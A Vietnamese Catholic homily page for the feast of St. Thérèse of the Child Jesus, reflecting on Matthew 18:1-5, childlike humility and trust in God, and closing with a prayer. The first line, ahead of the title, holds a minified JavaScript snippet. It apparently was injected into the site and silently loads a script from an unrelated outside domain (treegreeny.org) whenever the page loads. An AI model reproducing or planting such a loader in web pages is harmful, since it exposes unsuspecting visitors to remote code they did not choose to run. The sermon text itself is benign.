;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); NHỎ MÀ LỚN – Xitô PS

NHỎ MÀ LỚN

Lễ Kính Thánh Têrêsa Hài Đồng Giê su

NHỎ MÀ LỚN

Mt 18, 1-5

Nhỏ mà lại lớn, lời khẳng định này nghe có vẻ mâu thuẫn, bởi vì nhỏ là nhỏ mà lớn là lớn, chứ sao nhỏ mà lại lớn được. Ấy thế mà, có nhiều điều chúng ta nghe thì phi lý, nhưng lại rất hiển nhiên và thực tế. Có nhiều cái, nhiều điều nhỏ mà lớn trong đời sống tự nhiên cũng như trong đời sống siêu nhiên. Vậy những cái, những điều nhỏ mà lớn đó là gì?  

1. Những cái nhỏ mà lớn trong đời sống tự nhiên

Trong đời sống tự nhiên có nhiều cái, nhiều thứ tuy nhỏ nhưng mà lại làm được những việc rất lớn, xin đơn cử một số hình ảnh cụ thể sau: Cái bánh lái của con thuyền, tuy nhỏ nhưng nó có thể điều khiển cả một con thuyền lớn. Một hạt cải, nhỏ nhưng lại trở thành một cây lớn chim trời có thể đến làm tổ trên đó được (x. Lc 13,19). Những hạt nguyên tử nhỏ nổ ra sẽ gây ra hậu quả xấu cho cả một thành phố lớn. Một hình ảnh rất thời sự đang diễn ra đó là virus côrôna, một loại virus rất nhỏ, mắt thường con người không thể nhìn thấy, nhưng nó đang làm xáo trộn cả thế giới, làm cho không biết bao nhiêu người đã tử vong…Đó là những cái, những thứ nhỏ mà lại làm được những điều lớn trong đời sống tự nhiên mà chúng ta thấy rõ, còn trong đời sống siêu nhiên thì sao?

2. Những điều nhỏ mà lại lớn trong đời sống siêu nhiên

Khi các môn đệ hỏi Chúa Giêsu: “Thưa Thầy ai là người lớn nhất Nước Trời?” (Mt 18,1). Chúa Giêsu bảo: “Nếu anh em không trở lại mà nên như trẻ nhỏ, thì sẽ chẳng được vào nước trời” (Mt 18,3). Ngài còn nói: “Ai là người nhỏ nhất trong tất cả anh em, thì kẻ ấy là người lớn nhất” (x. Lc 9,48b). Câu nói này của Chúa Giêsu phải hiểu sao, nghe rất là mâu thuẫn và thắc mắc như ông Nicôđêmô một người già rồi, làm sao có thể sinh ra được, người đó có thể trở vào lòng mẹ lần thứ hai sao? (Ga 3,4). Thế nhưng, ý Chúa Giêsu muốn nói ở đây không hiểu theo nghĩa đen, là thân xác phải trở nên nhỏ bé lại,  nhưng là phải có những đức tính như trẻ nhỏ. Vậy những đức tính như trẻ nhỏ là gì?

Nên giống trẻ nhỏ không phải vì chúng ngây thơ vô tội, hay một đức tính luân lý nào, nhưng ở chỗ chúng sống lệ thuộc vào người lớn. Mỗi người chúng ta cũng cần biết lệ thuộc vào Chúa trong mọi sự. Giá trị của người môn đệ là ở chỗ đó, lý tưởng sống căn bản trong đời sống cộng đoàn là nên như trẻ nhỏ. Trẻ nhỏ còn có những đức tính đơn sơ, trong trắng, thật thà, không bon chen, không phân bì ghen tương, hoàn toàn cậy dựa vào cha mẹ. Sống tinh thần trẻ thơ, Chúa cũng mời gọi mỗi người chúng ta sống đơn sơ, trong trắng, chân thật không bon chen, không ghen tương tranh giành, không cậy vào sức riêng nhưng hoàn toàn cậy trông, phó thác, tin tưởng vào sự quan phòng yêu thương của Thiên Chúa. Sống khiêm nhường tự hạ như Chúa nói: “Ai tự hạ coi mình như em nhỏ này, người ấy sẽ là người lớn nhất Nước Trời” (Mt 18,4).

Thánh nữ Têrêsa Hài Đồng Giêsu mà Giáo Hội mừng kính hôm nay, ngài là một người phụ nữ nhỏ, tuổi đời mới có hai bốn tuổi nhưng ngài đã trở thành một vị thánh lớn, được Giáo Hội tuyên phong là tiến sĩ Hội Thánh và là bổn mạng của các xứ truyền giáo. Đó là nhờ ngài đã đi và thực hành con đường nhỏ bé thiêng liêng, đơn sơ như trẻ nhỏ. Ngài làm tất cả mọi việc nhỏ với một tình yêu lớn, những việc tầm thường với một tình yêu phi thường. Ngài nên thánh không phải bởi những điều vĩ đại, nhưng qua những việc làm nhỏ bé đầy ắp lòng mến .

Lạy Chúa, xin cho chúng con luôn ý thức mình là một thân phận nhỏ bé và yếu đuối của kiếp người, để từ đó biết khiêm nhường, sống tin tưởng phó thác trong vòng tay che chở của Chúa. Xin cho chúng con có tinh thần tuổi trẻ, những đức tính của trẻ thơ để chúng con luôn ở trong vòng tay yêu thương che chở của Chúa. Xin cho chúng con biết theo gương thánh nữ Têrêsa Hài Đồng Giêsu làm mọi việc nhỏ với một tình yêu lớn. Amen!

FM. Anton Claret Lê Thanh Sâm

You May Also Like

Trả lời

X